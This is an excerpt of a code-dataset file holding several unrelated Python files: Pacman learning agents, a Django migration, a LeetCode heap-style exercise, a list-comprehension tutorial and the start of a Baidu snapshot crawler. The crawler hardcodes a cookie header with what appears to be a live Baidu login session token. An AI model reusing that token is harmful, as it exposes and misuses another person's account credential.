Args:\n agent_id: The agent identifier.\n ally_ids: The identifier of the allies.\n enemy_ids: The identifier of the enemies.\n \"\"\"\n super(PacmanAgent, self).__init__(agent_id)\n self.actions = PACMAN_ACTIONS\n\n\nclass GhostAgent(ControllerAgent):\n \"\"\"A Base GhostAgent.\n\n Attributes:\n actions: List of ghosts actions.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the Constructor from the ControllerAgent superclass.\n\n Args:\n agent_id: The agent identifier.\n ally_ids: The identifier of the allies.\n enemy_ids: The identifier of the enemies.\n \"\"\"\n super(GhostAgent, self).__init__(agent_id)\n self.actions = GHOST_ACTIONS\n\n\nclass RandomPacmanAgent(PacmanAgent):\n \"\"\"Agent that randomly selects an action.\"\"\"\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Choose a random action.\n\n If there is a legal action choose a random action\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of 
currently allowed actions.\n            explore: Boolean whether agent is allowed to explore.\n        Returns:\n            Random action\n        \"\"\"\n        if len(legal_actions) > 0:\n            return random.choice(legal_actions)\n\n\nclass RandomPacmanAgentTwo(PacmanAgent):\n    \"\"\"A mostly random PacmanAgent.\n\n    This is not a completely random agent; it follows a set of rules. Those\n    rules are detailed in the choose_action procedure.\n    \"\"\"\n\n    def choose_action(self, state, action, reward, legal_actions, explore):\n        \"\"\"Choose a random action.\n\n        Choose a random action and keep repeating it until the agent reaches a\n        wall or has more than three possible moves. When there are more than\n        three possibilities, the agent has twice the chance of continuing in\n        the same direction.\n\n        Args:\n            state: Current game state.\n            action: Last executed action.\n            reward: Reward for the previous action.\n            legal_actions: List of currently allowed actions.\n            explore: Boolean whether agent is allowed to explore.\n        Returns:\n            Random action\n        \"\"\"\n        if action == 'Stop' or action not in legal_actions:\n            if 'Stop' in legal_actions:\n                legal_actions.remove('Stop')\n            if len(legal_actions) > 0:\n                return random.choice(legal_actions)\n        elif len(legal_actions) > 3:\n            if len(legal_actions) == 4:\n                number = random.choice([1, 2, 3, 4, 5])\n            else:\n                number = random.choice([1, 2, 3, 4, 5, 6])\n            if number == 1 or number == 2:\n                return action\n            aux = 3\n            legal_actions.remove(action)\n            for possible_action in legal_actions:\n                if number == aux:\n                    return possible_action\n                aux += 1\n            # Fallback in case the counter never matches an action.\n            return random.choice(legal_actions)\n        else:\n            return action\n\n\nclass bfs_PacmanAgent(PacmanAgent):\n    \"\"\"Agent that searches for the nearest food using the BFS algorithm.\"\"\"\n\n    def choose_action(self, state, action, reward, legal_actions, explore):\n        \"\"\"Choose the action that brings Pacman to the nearest food.\n\n        Args:\n            state: Current game state.\n            action: Last executed action.\n            reward: Reward for the previous action.\n            legal_actions: List of currently allowed actions.\n            explore: Boolean whether agent is allowed to explore.\n        Returns:\n            Suggested action\n        \"\"\"\n        queue = Queue.Queue()\n        visited = []\n\n        initial_position = state.get_position()\n\n        food_map = state.food_map\n\n        agent_map = state.get_map()\n\n        queue.put(initial_position)\n        visited.append(initial_position)\n\n        closest_food = None\n        while not queue.empty():\n\n            if(closest_food is not None):\n                break\n\n            current_edge = queue.get()\n            (k, l) = current_edge\n\n            random.shuffle(PACMAN_ACTIONS)\n            for actions in PACMAN_ACTIONS:\n\n                diff = agent_map.action_to_pos[actions]\n                new_edge = (k + diff[0],\n                            l + diff[1])\n\n                if agent_map._is_valid_position(new_edge):\n                    if new_edge not in visited:\n                        (i, j) = new_edge\n                        if food_map[i][j] > 0.0:\n                            if closest_food is None:\n                                closest_food = new_edge\n                        else:\n                            queue.put(new_edge)\n                            visited.append(new_edge)\n\n        if closest_food is None:\n            return Directions.STOP\n\n        best_action = None\n        min_dist = float('inf')\n\n        (f, p) = (0, 0)\n\n        for actions in legal_actions:\n\n            diff = agent_map.action_to_pos[actions]\n            new_edge = (initial_position[0] + diff[0],\n                        initial_position[1] + diff[1])\n\n            new_dist = state.calculate_distance(new_edge, closest_food)\n\n            if new_dist <= min_dist:\n                min_dist = new_dist\n                best_action = actions\n                (f, p) = new_edge\n\n        food_map[f][p] = 0.0\n        return best_action\n\n\nclass RandomGhostAgent(GhostAgent):\n    \"\"\"GhostAgent that randomly selects an action.\"\"\"\n\n    def choose_action(self, state, 
action, reward, legal_actions, explore):\n \"\"\"Choose a random action.\n\n If there is a legal action choose a random action\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n Returns:\n Random action\n \"\"\"\n if len(legal_actions) > 0:\n return random.choice(legal_actions)\n\n\nclass NimblePacmanAgent(PacmanAgent):\n \"\"\"Pacman that run away from ghosts and get food.\n\n Attributes:\n agent_id: The identifier of an agent.\n ally_ids: The identifier of all allies agents.\n enemy_ids: The identifier of all enemies agents.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the constructor from the PacmanAgent superclass.\n\n Args:\n agent_id: The identifier of an agent.\n ally_ids: The identifier of all allies agents.\n enemy_ids: The identifier of all enemies agents.\n \"\"\"\n super(NimblePacmanAgent, self).__init__(agent_id, ally_ids, enemy_ids)\n self.eat_behavior = behaviors.EatBehavior()\n\n def choose_action(self, state, action, reward, legal_actions, test):\n \"\"\"Choose the best action.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n test: Boolean whether agent is allowed to explore.\n \"\"\"\n agent_map = state.get_map()\n (x, y) = state.get_position()\n\n nearby_enemies = []\n enemies_locations = []\n fragile_enemies_position = []\n\n for p in state.enemy_ids:\n q = state.get_agent_position(p)\n enemies_locations.append(q)\n if state.get_fragile_agent(p):\n fragile_enemies_position.append(q)\n FragileFlag = True\n else:\n FragileFlag = False\n\n for enemy_position in enemies_locations:\n distance = state.calculate_distance((x, y), enemy_position)\n if distance < 4:\n nearby_enemies.append(enemy_position)\n\n if len(nearby_enemies) == 0:\n suggested_action = self.eat_behavior(state, legal_actions)\n if suggested_action in legal_actions:\n return suggested_action\n elif legal_actions == []:\n return Directions.STOP\n else:\n return random.choice(legal_actions)\n\n elif FragileFlag is True:\n min_distance = float('inf')\n best_action = None\n for enemie in fragile_enemies_position:\n for actions in legal_actions:\n diff = agent_map.action_to_pos[actions]\n new_position = (diff[0]+x, diff[1]+y)\n new_distance = state.calculate_distance(new_position,\n enemie)\n if(new_distance < min_distance):\n min_distance = new_distance\n best_action = action\n if(best_action is not None):\n return best_action\n\n else:\n max_distance = (-1)*float('inf')\n best_action = None\n for actions in legal_actions:\n new_distance = 0\n for enemie in nearby_enemies:\n diff = agent_map.action_to_pos[actions]\n new_position = (diff[0]+x, diff[1]+y)\n new_distance += state.calculate_distance(new_position,\n enemie)\n if new_distance > max_distance:\n max_distance = new_distance\n best_action = actions\n return best_action\n\n\nclass EaterPacmanAgent(PacmanAgent):\n \"\"\"Greedy Pacman Agent.\n\n Args:\n eat_behavior: Implement the eat behavior.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the constructor from the PacmanAgent superclass.\n\n Args:\n agent_id: The identifier of an agent.\n ally_ids: The identifier of all allies agents.\n enemy_ids: The identifier of all enemies agents.\n \"\"\"\n super(EaterPacmanAgent, self).__init__(agent_id, ally_ids, 
enemy_ids)\n        self.eat_behavior = behaviors.EatBehavior()\n\n    def choose_action(self, state, action, reward, legal_actions, test):\n        \"\"\"Choose a suggested action.\n\n        Choose the action suggested by the eat behavior if it is legal; if\n        there are no legal actions, stand still; otherwise fall back to a\n        random legal action.\n\n        Args:\n            state: Current game state.\n            action: Last executed action.\n            reward: Reward for the previous action.\n            legal_actions: List of currently allowed actions.\n            test: enable or disable test mode.\n        Returns:\n            Suggested Action.\n        \"\"\"\n        suggested_action = self.eat_behavior(state, legal_actions)\n\n        if suggested_action in legal_actions:\n            return suggested_action\n        elif legal_actions == []:\n            return Directions.STOP\n        else:\n            return random.choice(legal_actions)\n\n\nclass BehaviorLearningPacmanAgent(PacmanAgent):\n    \"\"\"Behavior Learning Pacman Agent.\n\n    Attributes:\n        features: features the Pacman can use.\n        behaviors: list of possible Pacman behaviors.\n        K: learning rate numerator; the effective learning rate decays as\n            K / (K + iteration).\n        exploration_rate: rate of exploration.\n        learning: instance of QLearningWithApproximation.\n        previous_behavior: The previous behavior used.\n        behavior_count: How many times each behavior has been used.\n        test_mode: Whether the agent is in test mode (defaults to False).\n    \"\"\"\n\n    def __init__(self, agent_id, ally_ids, enemy_ids):\n        \"\"\"Constructor for the BehaviorLearningPacmanAgent.\n\n        Extend the PacmanAgent constructor.\n\n        Set up the features the Pacman will use and its behaviors, set the\n        exploitation and exploration rates, initialize a\n        QLearningWithApproximation object, initialize the behavior count and\n        set test mode to 'False'.\n\n        Args:\n            agent_id: The identifier of the agent.\n            ally_ids: The identifiers of all the allies.\n            enemy_ids: The identifiers of all the enemies.\n        \"\"\"\n        super(BehaviorLearningPacmanAgent, self).__init__(agent_id, ally_ids,\n                                                          enemy_ids)\n        self.features = [features.FoodDistanceFeature()]\n        for enemy_id in enemy_ids:\n            self.features.append(features.EnemyDistanceFeature(enemy_id))\n        for id_ in [agent_id] + ally_ids + enemy_ids:\n            self.features.append(features.FragileAgentFeature(id_))\n\n        self.behaviors = [behaviors.EatBehavior(),\n                          behaviors.FleeBehavior(),\n                          behaviors.SeekBehavior(),\n                          behaviors.PursueBehavior()]\n\n        self.K = 1.0 # Learning rate\n        self.exploration_rate = 0.1\n\n        QLearning = learning.QLearningWithApproximation\n        self.learning = QLearning(learning_rate=0.1, discount_factor=0.9,\n                                  actions=self.behaviors,\n                                  features=self.features,\n                                  exploration_rate=self.exploration_rate)\n        self.previous_behavior = self.behaviors[0]\n        self.behavior_count = {}\n        self.reset_behavior_count()\n\n        self.test_mode = False\n\n    def reset_behavior_count(self):\n        \"\"\"Reset the behavior count for each behavior.\"\"\"\n        for behavior in self.behaviors:\n            self.behavior_count[str(behavior)] = 0\n\n    def get_policy(self):\n        \"\"\"Get the policy for the agent.\n\n        Returns:\n            The agent weights.\n        \"\"\"\n        return self.learning.get_weights()\n\n    def set_policy(self, weights):\n        \"\"\"Set the policy for the agent.\n\n        Set the learning agent weights.\n\n        Args:\n            weights: The weights of a feature.\n        \"\"\"\n        self.learning.set_weights(weights)\n\n    def choose_action(self, state, action, reward, legal_actions, test):\n        \"\"\"Choose a suggested action.\n\n        Choose the action suggested by the QLearningWithApproximation class;\n        if it is not legal, choose Directions.STOP when there are no legal\n        actions, or a random legal action otherwise.\n\n        Args:\n            state: Current game state.\n            action: Last executed action.\n            reward: Reward for the previous action.\n            legal_actions: List of currently allowed actions.\n            test: enable or disable test mode.\n        Returns:\n            A suggested action from the QLearningWithApproximation\n        \"\"\"\n        if test:\n            self.enable_test_mode()\n        else:\n            self.enable_learn_mode()\n\n        if not self.test_mode:\n            self.learning.learning_rate = self.K / (self.K + state.iteration)\n            self.learning.learn(state, self.previous_behavior, reward)\n\n        behavior = self.learning.act(state)\n        self.previous_behavior = behavior\n        suggested_action = behavior(state, legal_actions)\n\n        self.behavior_count[str(behavior)] += 1\n\n        if suggested_action in legal_actions:\n            return suggested_action\n        elif legal_actions == []:\n            return Directions.STOP\n        else:\n            return random.choice(legal_actions)\n\n    def enable_learn_mode(self):\n        \"\"\"Enable Learn Mode.\n\n        Set the exploration rate of learning to the class exploration rate.\n        \"\"\"\n        self.test_mode = False\n        self.learning.exploration_rate = self.exploration_rate\n\n    def enable_test_mode(self):\n        \"\"\"Enable Test Mode.\"\"\"\n        self.test_mode = True\n        self.learning.exploration_rate = 0\n\n\nclass BehaviorLearningGhostAgent(GhostAgent):\n    \"\"\"Behavior Learning Ghost Agent.\n\n    Attributes:\n        features: features the ghost can use.\n        behaviors: list of possible ghost behaviors.\n        K: learning rate numerator; the effective learning rate decays as\n            K / (K + iteration).\n        exploration_rate: rate of exploration.\n        learning: instance of QLearningWithApproximation.\n        previous_behavior: The previous behavior used.\n        behavior_count: How many times each behavior has been used.\n        test_mode: Whether the agent is in test mode (defaults to False).\n    \"\"\"\n\n    def __init__(self, agent_id, ally_ids, enemy_ids):\n        \"\"\"Constructor for the BehaviorLearningGhostAgent.\n\n        Extend the GhostAgent constructor.\n\n        Set up the features the ghosts will use and their behaviors, set the\n        exploitation and exploration rates, initialize a\n        QLearningWithApproximation object, initialize the behavior count and\n        set test mode to 'False'.\n        Args:\n            agent_id: The identifier of the agent.\n            ally_ids: The identifiers of all the allies.\n            enemy_ids: The identifiers of all the enemies.\n        \"\"\"\n        super(BehaviorLearningGhostAgent, self).__init__(agent_id, ally_ids,\n                                                         enemy_ids)\n        self.features = [features.FoodDistanceFeature()]\n        for enemy_id in enemy_ids:\n            self.features.append(features.EnemyDistanceFeature(enemy_id))\n        for id_ in [agent_id] + ally_ids + enemy_ids:\n            self.features.append(features.FragileAgentFeature(id_))\n\n        self.behaviors = [behaviors.FleeBehavior(),\n                          behaviors.SeekBehavior(),\n                          behaviors.PursueBehavior()]\n\n        self.K = 1.0 # Learning rate\n        self.exploration_rate = 0.1\n        QLearning = learning.QLearningWithApproximation\n        self.learning = QLearning(learning_rate=0.1, discount_factor=0.9,\n                                  actions=self.behaviors,\n                                  features=self.features,\n                                  exploration_rate=self.exploration_rate)\n        self.previous_behavior = self.behaviors[0]\n        self.behavior_count = {}\n        self.reset_behavior_count()\n        self.actual_behavior = self.previous_behavior\n        self.test_mode = False\n\n    def reset_behavior_count(self):\n        \"\"\"Reset behavior count for each behavior.\"\"\"\n        for behavior in self.behaviors:\n            self.behavior_count[str(behavior)] = 0\n\n    def get_policy(self):\n        \"\"\"Get the policy for the agent.\n\n        Returns:\n            The agent weights.\n        \"\"\"\n        return self.learning.get_weights()\n\n    def set_policy(self, weights):\n        \"\"\"Set the policy for the agent.\n\n        Set the learning agent weights.\n\n        Args:\n            weights: The weights of a feature.\n        \"\"\"\n        self.learning.set_weights(weights)\n\n    def choose_action(self, state, action, reward, legal_actions, test):\n        \"\"\"Choose a suggested action.\n\n        Choose the action suggested by the QLearningWithApproximation class;\n        if it is not legal, choose Directions.STOP when there are no legal\n        actions, or a random legal action otherwise.\n\n        Args:\n            state: Current game state.\n            action: Last executed action.\n            reward: Reward for the previous action.\n            legal_actions: List of currently allowed actions.\n            test: enable or disable test mode.\n        Returns:\n            A suggested action from the QLearningWithApproximation\n        \"\"\"\n        if test:\n            self.enable_test_mode()\n        else:\n            self.enable_learn_mode()\n\n        if not self.test_mode:\n            self.learning.learning_rate = self.K / (self.K + state.iteration)\n            self.learning.learn(state, self.previous_behavior, reward)\n\n        # print (\"\\nAgent {} communicates:\".format(self.agent_id))\n        # print (\"Before - behavior of agent {}: {}\".\n        #        format(self.agent_id, self.actual_behavior))\n        behavior = self.learning.act(state, self.actual_behavior)\n        self.actual_behavior = behavior\n        self.previous_behavior = behavior\n        # print (\"After - behavior of agent {}: {}\".\n        #        format(self.agent_id, behavior))\n\n        suggested_action = behavior(state, legal_actions)\n\n        self.behavior_count[str(behavior)] += 1\n\n        if suggested_action in legal_actions:\n            return suggested_action\n        elif legal_actions == []:\n            return Directions.STOP\n        else:\n            return random.choice(legal_actions)\n\n    def enable_learn_mode(self):\n        \"\"\"Enable Learn Mode.\n\n        Set the exploration rate of learning to the class exploration rate.\n        \"\"\"\n        self.test_mode = False\n        self.learning.exploration_rate = self.exploration_rate\n\n    def enable_test_mode(self):\n        \"\"\"Enable Test Mode.\"\"\"\n        self.test_mode = True\n        self.learning.exploration_rate = 0\n","sub_path":"pacman/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":36879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248767908","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('habilidades', '0010_auto_20150616_1300'),\n        ('usuarios', '0012_auto_20150609_1304'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='teNecesitoModel',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('mensaje', models.CharField(max_length=200)),\n                ('fecha', models.DateTimeField(auto_now=True)),\n                ('habilidadSolicitada', models.ForeignKey(to='habilidades.habilidadesModel')),\n                ('usuarioRequerido', models.ForeignKey(related_name=b'requerido', to='usuarios.perfilUsuarioModel')),\n                ('usuarioSolicitante', models.ForeignKey(related_name=b'solicitante', to='usuarios.perfilUsuarioModel')),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n    ]\n","sub_path":"necesito/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280750025","text":"# 703-Kth_Largest_Element_in_a_Stream_EASY.py\n\n# https://leetcode.com/problems/kth-largest-element-in-a-stream/\n\n# Design a class to find the kth largest element in a stream. 
Note that it is the kth largest element in the sorted order, not the kth distinct element.\n\n# Your KthLargest class will have a constructor which accepts an integer k and an integer array nums, which contains initial elements from the stream. For each call to the method KthLargest.add, return the element representing the kth largest element in the stream.\n\n# Example:\n\n# int k = 3;\n# int[] arr = [4,5,8,2];\n# KthLargest kthLargest = new KthLargest(3, arr);\n# kthLargest.add(3); // returns 4\n# kthLargest.add(5); // returns 5\n# kthLargest.add(10); // returns 5\n# kthLargest.add(9); // returns 8\n# kthLargest.add(4); // returns 8\n# Note:\n# You may assume that nums' length ≥ k-1 and k ≥ 1.\n\nfrom typing import List\n\nclass KthLargest:\n\n def __init__(self, k: int, nums: List[int]):\n\n self.k = k\n self.nums = nums\n # Initialize with sorted array of the largest elements of nums:\n self.kth_largest_elements = sorted(nums)[-k:]\n\n\n def add(self, val: int) -> int:\n\n # check if bigger than kth largest, or if kth largest isn't full\n if (\n (len(self.kth_largest_elements) < self.k) or\n (val > self.kth_largest_elements[0])\n ):\n self.insert_and_sort(val)\n\n # return minimum element. safe bc we always have one element by\n # this point even if starting with nums = []\n return self.kth_largest_elements[0]\n\n\n def insert_and_sort(self, val: int) -> None:\n \"\"\"Insert single element into list and re-sort the list.\"\"\"\n\n # add the value if an empty list:\n if self.kth_largest_elements == []:\n self.kth_largest_elements.append(val)\n return\n\n # O(NlogN) insert (32 ms with example)\n\n # replace minimum with added element if larger\n if (len(self.kth_largest_elements) < self.k):\n self.kth_largest_elements.append(val)\n else:\n self.kth_largest_elements[0] = val\n\n # re-sort self.kth_largest_elements\n self.kth_largest_elements = sorted(self.kth_largest_elements)\n\n # # O(N) insert (24 ms with example)\n # # Too slow for leetcode\n\n # # Insert before element larger or equal to val\n\n # # Remove the smallest element or add a new smallest element\n # if (len(self.kth_largest_elements) < self.k):\n # self.kth_largest_elements = [None] + self.kth_largest_elements\n # else:\n # self.kth_largest_elements[0] = None\n\n # i = 0\n # while i < len(self.kth_largest_elements) - 1:\n # # check if the next element is equal or larger, if so insert in i-1\n # if self.kth_largest_elements[i + 1] >= val:\n # self.kth_largest_elements[i] = val\n # break\n # # if not, then swap the next element and the previous\n # # to move the empty space down\n # else:\n # self.kth_largest_elements[i] = self.kth_largest_elements[i + 1]\n # self.kth_largest_elements[i + 1] = None\n\n # i += 1\n\n # # if largest element, insert at the end\n # if self.kth_largest_elements[-1] == None:\n # self.kth_largest_elements[-1] = val\n\n\n\n# Your KthLargest object will be instantiated and called as such:\n# obj = KthLargest(k, nums)\n# param_1 = obj.add(val)\n\n\n# Assumptions\n# elements are numeric\n# k elements can fit on a single machine or the api for multi-machine\n# lists is the same as on a single machine\n\n# Approach\n# Keep a sorted array of the kth largest elements so far.\n# initialize with sorted array of the largest elements of nums.\n# Keep the minimum element in the largest elements\n# If the new element is larger than the minimum, replace\n# the minimum with it and re-sort the largest elements.\n# Return the minimum element on each add.\n\n# Complexity\n# Time\n# Each insert we have to check whether 
it is larger than the smallest\n# element (the kth largest). If it is, we need to insert and re-sort\n# the largest elements. Everything other than the re-sort is O(1) and\n# the re-sort can be done in O(NlogN) time. However, if we start with\n# a sorted list, we are only inserting one element. We can do that in O(N)\n# time by checking each value and inserting before any that are larger.\n# Space\n# O(k) since we store the kth largest elements and a few variables\n\n# Potential improvements\n# Maybe instead of sorting on each insert of the kth list we can iterate\n# through it until we find a larger element than the one to be inserted\n# and then insert it before that element.\n\n# This could also be done with a min heap of size k\n# Also the insertion can be done with a binary search type algorithm to\n# find where to insert\n\n\n# Edge cases\n# I can't think of any. All are covered in the example note\n\n\n# Examples:\n\n# Given\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[3,[4,5,8,2]],[3],[5],[10],[9],[4]]\n\n# list index out of range\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[1,[]],[-3],[-2],[-4],[0],[4]]\n\n# Wrong Answer\n# Input\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[2,[0]],[-1],[1],[-2],[-4],[3]]\n# Output\n# [null,-1,1,-2,-4,3]\n# Expected\n# [null,-1,0,0,0,1]\n\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[3,[4,5,8,2]],[3],[5],[10],[9],[4]]\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[1,[]],[-3],[-2],[-4],[0],[4]]\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[2,[0]],[-1],[1],[-2],[-4],[3]]\n\n\n\n\n\n\n\n\n\n","sub_path":"leetcode/703-Kth_Largest_Element_in_a_Stream_EASY.py","file_name":"703-Kth_Largest_Element_in_a_Stream_EASY.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"211228330","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 2 08:42:48 2021\r\n\r\n@author: Jose Luis Robledo\r\n\r\n\r\nList comprehensions\r\n\r\nA kind of construct that consists of an expression determining how to \r\nmodify the elements of a list, followed by one or more for clauses and, \r\noptionally, one or more if clauses. \r\nThe result obtained is a list.\r\n\r\n\r\n\"\"\"\r\n\r\nlista = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n\r\n# Each element of the list is cubed\r\ncubos = [valor ** 3 for valor in lista]\r\nprint('Cubes of 1 to 10:', cubos)\r\n\r\n\r\n\r\nx= (1, 3, 4)\r\ny=1\r\nz=3\r\nvariable = lambda x,y,z: x[2] if x[0]==y and x[1]==z else 0\r\nprint(variable(x,y,z))\r\n\r\n\r\n\r\nnumeros = [135, 154, 180, 193, 210]\r\ndivisiblespor3 = [valor for valor in numeros if valor % 3.0 == 0] \r\ndiv3Lambda = list(filter(lambda x : x%3 == 0, numeros))\r\nprint(divisiblespor3)\r\nprint(div3Lambda)\r\n \r\n\r\n# Print the list of numbers divisible by 3\r\nprint(divisiblespor3) \r\n\r\n\r\n# Define a function that returns the inverse of a number\r\ndef funcion(x):\r\n    return 1/x\r\n\r\ninv=lambda x:1/x\r\n\r\nlista2 = [1, 2, 3] # declare a list\r\n\r\n# Print the list with the inverse of each number\r\nprint([funcion(index) for index in lista2])\r\nprint([inv(elemento) for elemento in lista2])\r\n\r\n\r\nresultado = lambda x:[1/x for x in lista2]\r\n# Note: this prints the lambda object itself, not the list it would build\r\nprint(resultado) \r\n\r\n\r\nlis=[1,2,3]\r\n\r\nlis2=[4,5,6]\r\n\r\nlista=[(1,2), (1,2), (1,2), (1,2)]\r\n\r\n\r\n\r\ncomprension = lambda lista: [[x] for x in lista]\r\n\r\n# Note: this also prints the lambda object, not its result\r\nprint(comprension)","sub_path":"pandas/programacionFuncional7_ComprensionListas.py","file_name":"programacionFuncional7_ComprensionListas.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"480150654","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n    Script name: Baidu Snapshot crawler\nCreated on 2018-12-19\n@author:David Yisun\n@group:data\n\"\"\"\nimport requests\nimport codecs\nimport pipline\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport traceback\n\nclass BaiduMainPage(object):\n    url = 'https://www.baidu.com/s?wd={query}&pn={begin}&oq={query}&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=8460c003000041d8&rsv_t=ad2aqJ3Xx3EmAaLI3lNWNV9csWxTR9rdBLhn/b6L9lsixrMb1E9y4dgEEalZgUsNBIYV'\n    headers = {}\n    headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n    headers['Accept-Encoding'] = 'gzip, deflate, br'\n    headers['Accept-Language'] = 'zh-CN,zh;q=0.9'\n    headers['Cache-Control'] = 'max-age=0'\n    headers['Connection'] = 'keep-alive'\n    headers['Cookie'] = 'BIDUPSID=1B0624DB91D6B86D61BC78197CFCB16D; PSTM=1513914037; __cfduid=dd303636c42617357f780112656b6b3ed1516424757; BD_UPN=12314753; BDUSS=DJzTms1ei1nQmRPeThXRU84MWRFNXM1NjNweGc5dnJ4TWZ0cmc3Z3dsNEw2eWxiQVFBQUFBJCQAAAAAAAAAAAEAAACCG2IUanVucmVuNTAyNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAteAlsLXgJbV; ispeed_lsm=0; MCITY=-340%3A; BAIDUID=5565517DE650311BD281189A14755D35:FG=1; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; delPer=0; BD_CK_SAM=1; PSINO=7; BDRCVFR[feWj1Vr5u3D]=mk3SLVN4HKm; H_PS_PSSID=28118_1452_21084_19897_28132_27751_28140_22157; sugstore=1; H_PS_645EC=42edEeet9x%2BSALmsNibWHoI27RP%2FN1eGe6AYdOZTNMZ4F73UeIoHTJU15GSqG3pJLLxb'\n    headers['Host'] = 'www.baidu.com'\n    headers['Upgrade-Insecure-Requests'] = '1'\n    headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n\n    # proxy IPs\n    proxies_ip = {'HTTP': [],\n                  'HTTPS': []}\n\n    def __init__(self, project_name):\n        self.project_name = project_name\n        return\n\n    def proxy_pool(self, file_names, head):\n        with codecs.open(file_names, 'r', 'utf-8') as f:\n            data = f.read()\n        self.proxies_ip[head] = data.splitlines()\n\n    def 
data_preprocess(self, filename, is_flushdb=False):\n \"\"\"\n 数据预处理 将url写进redis\n :param is_flushdb:\n :return:\n \"\"\"\n pipline.push_data_to_redis(url='{0}', crawler_name=self.project_name,\n is_flushdb=is_flushdb, filename=filename)\n \n def request(self, query, begin=0, proxy=None):\n url = self.url.format(begin=begin, query=query)\n if proxy==None:\n res = requests.get(url=url, headers=self.headers)\n else:\n res = requests.get(url=url, headers=self.headers, proxies=proxy)\n res.encoding = res.apparent_encoding\n return res\n \n def parse(self, text):\n soup = BeautifulSoup(text, 'lxml')\n content_left = soup.find_all('div', id='content_left')[0]\n result = []\n for container in content_left.find_all('div', class_='result c-container '):\n abstracts = container.find_all('div', class_=\"c-abstract\")\n ems = [] # 匹配词\n sentense = []\n for abstract in abstracts:\n ems += [i.text for i in abstract.find_all('em')]\n sentense.append(abstract.text)\n links = [i.get('href') for i in container.find_all('a', text='百度快照')]\n result.append([ems, sentense, links])\n return result\n\n def fileter(self, ems, keys):\n def _filter(k):\n res = False\n for i in ems:\n if re.findall(k, i) != []:\n res = True\n return res\n return res\n result = list(map(_filter, keys))\n if sum(result) == len(keys):\n return True\n else:\n return False\n\n def request_from_redis(self, max_step=30000, sleep=1):\n r = pipline.connect_redis().con\n step = 1\n error_step = 0\n while True:\n query = r.lpop(self.project_name)\n print('='*60)\n t1 = time.time()\n if query == None or step>max_step:\n break\n query = query.decode('utf-8')\n print('step: {0}'.format(step))\n print(query)\n # 获取有效links\n links = []\n get_data = False\n\n try:\n for page in [0]: # 每个query爬取10页\n _links = self.parse(text=self.request(query=query, begin=page).text)\n links += [link[2] for link in _links if self.fileter(ems=link[0], keys=query.split(' ')) and link[2] != []]\n time.sleep(1)\n for link in links:\n baidu_snapshot = BaiduSnapshot(url=link[0], keys=query.split(' '))\n result = baidu_snapshot.get_text()\n if result == []:\n continue\n data = {'query':query, 'text':result}\n pipline.insert_data_to_mongo(db_name=self.project_name, collection_name='text', data=data)\n get_data = True\n error_step = 0\n except Exception as e:\n try:\n print('url:{0}'.format(link))\n except:\n pass\n print(traceback.print_exc())\n error_step += 1\n if not get_data:\n r.rpush(self.project_name, query)\n # try:\n # for page in [0, 10, 20, 30]: # 每个query爬取4页\n # _links = self.parse(text=self.request(query=query, begin=page).text)\n # links += [link[2] for link in _links if self.fileter(ems=link[0], keys=query.split(' '))]\n # time.sleep(1)\n # for link in links:\n # baidu_snapshot = BaiduSnapshot(url=link[0], keys=query.split(' '))\n # result = baidu_snapshot.get_text()\n # pipline.insert_data_to_mongo(db_name=self.project_name, collection_name='text', data=result)\n # get_data = True\n # except Exception as e:\n # print(e)\n # error_step += 1\n # if not get_data:\n # r.rpush(self.project_name, query)\n if error_step >5:\n print('continuous errors')\n break\n t2 = time.time()\n print('time takes {0}'.format(t2-t1))\n print('=' * 60)\n step += 1\n time.sleep(sleep)\n # 断开连接\n r.connection_pool.disconnect()\n\n\nclass BaiduSnapshot(object):\n 